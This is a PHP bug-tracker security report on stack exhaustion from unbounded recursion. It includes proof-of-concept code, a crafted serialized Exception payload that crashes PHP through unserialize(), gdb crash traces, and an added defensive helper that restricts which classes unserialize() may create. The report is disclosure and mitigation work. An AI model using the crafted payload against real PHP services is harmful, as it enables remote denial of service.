Remotely triggerable stack exhaustion via recursive method calls
| Sec Bug #69793 | Remotely triggerable stack exhaustion via recursive method calls | | |
|---|---|---|---|
| Submitted: | 2015-06-10 16:42 UTC | Modified: | 2015-08-04 22:20 UTC |
| From: | andrea dot palazzo at truel dot it | Assigned: | |
| Status: | Closed | Package: | Class/Object related |
| PHP Version: | Irrelevant | OS: | Ubuntu x86_64 |
| Private report: | No | CVE-ID: | None |
[2015-06-10 16:42 UTC] andrea dot palazzo at truel dot it
Description:
------------
Hello guys,
I marked this one as "security" because the crash is remotely triggerable (via unserialize()), so I thought you might not want it public; it doesn't seem to be exploitable, though.
The problem lies in how recursive method calls are handled: the number of nested calls a method can perform to itself doesn't seem to be limited, causing an infinite recursion that would result in invalid memory read access due to stack exhaustion.
The POC is trivial:
```php
<?php
class Dummy
{
    // Unbounded self-recursion: no depth limit is enforced by the engine,
    // so the call stack grows until it is exhausted.
    public function recursion()
    {
        $this->recursion();
    }
}

$x = new Dummy;
$x->recursion();
?>
```
```text
(gdb) r rec.php
Starting program: /usr/bin/php rec.php
Program received signal SIGSEGV, Segmentation fault.
zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h:592
592 in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h
```
Unfortunately, this is also triggerable remotely by crafting a special serialized object, also using only built-in classes like:
```php
<?php
// Crafted serialized Exception: the 'file' property is R:1, a back-reference
// to the object itself, so converting it to a string recurses without bound.
$e = unserialize('O:9:"Exception":7:{s:17:"'."\0".'Exception'."\0".'string";s:1:"a";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";R:1;s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";i:10;s:10:"'."\0".'*'."\0".'message";N;}');
var_dump($e."");
?>
```
```text
(gdb) r exception.php
Starting program: /usr/bin/php exception.php
Program received signal SIGSEGV, Segmentation fault.
zend_parse_va_args (num_args=num_args@entry=0, type_spec=0xb0776b "",
    va=va@entry=0x7fffff7ff058, flags=flags@entry=0)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c:827
827 in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c
```
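The remote trigger in this report depends on unserialize() instantiating a built-in class from attacker-controlled input. As an added defensive example (not part of the bug report or of PHP's own code), the helper below uses the `allowed_classes` option of unserialize() (PHP 7.0 and later) so that untrusted data cannot create an Exception at all; the function names and the depth limit are hypothetical choices of this example.

```php
<?php
// Added example, not from the bug report. Untrusted serialized input is
// restricted to an explicit allow list of classes; any other class becomes a
// __PHP_Incomplete_Class stub whose methods (including Exception::__toString())
// never execute. Requires PHP >= 7.0 for the allowed_classes option.

/**
 * Deserialize untrusted data, permitting only the classes in $allowedClasses.
 * Returns null when the payload is malformed or names a class that is not
 * on the list, so callers never receive a smuggled-in object.
 */
function unserialize_untrusted(string $data, array $allowedClasses = [])
{
    $value = @unserialize($data, ['allowed_classes' => $allowedClasses]);
    if ($value === false && $data !== 'b:0;') {
        return null;                      // malformed payload
    }
    if (contains_incomplete_class($value)) {
        return null;                      // a disallowed class was requested
    }
    return $value;
}

/**
 * Look for __PHP_Incomplete_Class stubs nested inside arrays or objects.
 * The walk is depth-limited (hypothetical cap of 32) so that a cyclic
 * structure built with R: back-references cannot recurse without bound.
 */
function contains_incomplete_class($value, int $depth = 0): bool
{
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if ($depth >= 32) {
        return true;                      // too deep: treat as hostile
    }
    if (is_array($value) || is_object($value)) {
        foreach ((array) $value as $item) {
            if (contains_incomplete_class($item, $depth + 1)) {
                return true;
            }
        }
    }
    return false;
}

// The crafted Exception from the report: with an empty allow list it is
// deserialized as an incomplete stub and rejected instead of being run.
$crafted = 'O:9:"Exception":7:{s:17:"'."\0".'Exception'."\0".'string";s:1:"a";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";R:1;s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";i:10;s:10:"'."\0".'*'."\0".'message";N;}';
var_dump(unserialize_untrusted($crafted));               // rejected
var_dump(unserialize_untrusted('a:1:{i:0;s:2:"ok";}'));  // plain data passes
```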
[2015-08-04 22:22 UTC] stas@php.net
-Status: Open +Status: Closed